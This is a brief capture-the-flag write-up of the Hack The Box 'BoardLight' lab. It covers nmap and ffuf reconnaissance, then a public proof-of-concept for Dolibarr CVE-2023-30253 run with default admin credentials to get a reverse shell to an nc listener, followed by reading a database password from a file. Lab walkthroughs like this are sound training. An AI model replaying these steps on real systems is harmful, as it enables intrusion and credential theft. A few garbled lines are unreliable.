BoardLight

Date: 14, jun, 2024

Author: H3cktor

Recon

Using NMAP to make Recon

nmap -sC -sV 10.10.11.11

-sV => Attempts to determine the version of the service running on port

-sC => Scan with default NSE scripts. Considered useful for discovery and safe

After the nmap scan we can see an apache server listening on port 80:

Lets add this to our host file:

sudo nano /etc/hosts

Lets first try to do a directory search to try to find any hidden files/directory's. I will use gobuster to do this:

Make subdomain enumeration Using FFUF

ffuf -H "Host: FUZZ.board.htb"  -u http://10.10.11.11/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt  -fw 6243

See i found the Subdomain crm.10.10.11.11

I Found the crm panel

Ok Now Found the Dolibarr version 17.0.0 and i Search in Google to get any CVE

i found Dolibarr-17.0.0-CVE-2023-30253

Reverse Shell POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253), PHP Code Injection

sudo python3 exploit.py   http://crm.board.htb admin admin  <ip Your tun0> 9000

listen revers shell => Must run listening in First

nc -nvlp 9000

First I provided a listener and then executed the exploit.py file. Then I provided the credentials as well as my attacker ip and the listening port. After executing, I successfully got a reverse shell

B0000000M!

I cat Found in pass or Cardantional

put i see the user name larissa

I found the main database password in the file.

PreviousHTB NextLame

Last updated 7 months ago